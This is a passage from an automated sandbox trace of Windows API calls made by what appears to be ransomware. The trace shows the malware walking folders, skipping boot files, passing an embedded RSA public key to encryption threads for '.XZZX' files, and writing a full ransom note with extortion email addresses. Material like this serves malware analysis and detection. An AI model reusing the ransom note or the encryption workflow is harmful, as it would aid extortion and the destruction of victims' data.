HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12dc [0243.085] Sleep (dwMilliseconds=0x96) [0243.240] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0243.240] lstrcmpW (lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpString2="..") returned 1 [0243.240] lstrcmpW (lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpString2=".") returned 1 [0243.240] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0243.241] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="ntldr") returned 0x0 [0243.241] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="NTLDR") returned 0x0 [0243.241] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0243.241] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="ntdetect.com") returned 0x0 [0243.241] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0243.241] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0243.241] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0243.241] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.241] lstrcpyW (in: lpString1=0x17be7c, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0243.241] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.241] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12e0 [0243.241] Sleep (dwMilliseconds=0x96) [0243.396] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0243.396] lstrcmpW (lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpString2="..") returned 1 [0243.396] lstrcmpW (lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpString2=".") returned 1 [0243.396] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0243.397] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="ntldr") returned 0x0 [0243.397] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="NTLDR") returned 0x0 [0243.397] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0243.397] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0243.397] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0243.397] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0243.397] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0243.397] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.397] lstrcpyW (in: lpString1=0x17be7c, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0243.397] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12e4 [0243.397] Sleep (dwMilliseconds=0x96) [0243.552] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0243.552] lstrcmpW (lpString1="EED603F80D860CC870D6498A119DF110.XZZX", lpString2="..") returned 1 [0243.552] lstrcmpW (lpString1="EED603F80D860CC870D6498A119DF110.XZZX", lpString2=".") returned 1 [0243.552] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0243.553] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="ntldr") returned 0x0 [0243.553] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="NTLDR") returned 0x0 [0243.553] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0243.553] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="ntdetect.com") returned 0x0 [0243.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0243.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0243.553] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0243.553] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.553] lstrcpyW (in: lpString1=0x17be7c, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0243.553] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.553] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfe8 [0243.553] Sleep (dwMilliseconds=0x96) [0243.708] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0243.708] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0243.709] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0243.709] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0243.709] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0243.709] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0243.709] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0243.709] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0243.709] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0243.709] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0243.709] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0243.709] SetErrorMode (uMode=0x1) returned 0x1 [0243.709] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT") returned 76 [0243.709] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0243.709] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0243.709] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xfec) returned 0x0 [0243.709] RegQueryValueExW (in: hKey=0xfec, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dcc70, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43dcc70*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0243.709] RegCloseKey (hKey=0xfec) returned 0x0 [0243.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0243.709] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0243.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfec [0243.710] CloseHandle (hObject=0xfec) returned 1 [0243.710] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0243.710] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0243.710] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0243.710] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0243.710] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.710] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0243.710] SetErrorMode (uMode=0x1) returned 0x1 [0243.710] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0243.710] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0243.710] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0243.710] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*" [0243.710] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0243.710] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0243.710] lstrcpyW (in: lpString1=0x17a5a4, lpString2="9Y_m-oVB2IyYX" | out: lpString1="9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0243.710] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0243.710] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="ntldr") returned 0x0 [0243.710] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="NTLDR") returned 0x0 [0243.710] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0243.711] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0243.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0243.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0243.711] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0243.711] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.711] lstrcpyW (in: lpString1=0x17addc, lpString2="06C3ECFB13862898AA23710517BB0CE0.XZZX" | out: lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX") returned="06C3ECFB13862898AA23710517BB0CE0.XZZX" [0243.711] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0243.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xff0 [0243.711] Sleep (dwMilliseconds=0x96) [0243.864] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0243.864] lstrcmpW (lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpString2="..") returned 1 [0243.864] lstrcmpW (lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpString2=".") returned 1 [0243.864] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0243.865] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="ntldr") returned 0x0 [0243.865] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="NTLDR") returned 0x0 [0243.865] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0243.865] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="ntdetect.com") returned 0x0 [0243.865] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0243.865] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0243.865] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0243.865] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.865] lstrcpyW (in: lpString1=0x17addc, lpString2="38DC595E3788A5BA7503B1493BA98A02.XZZX" | out: lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX") returned="38DC595E3788A5BA7503B1493BA98A02.XZZX" [0243.865] lstrcpyW (in: lpString1=0x17a9dc, 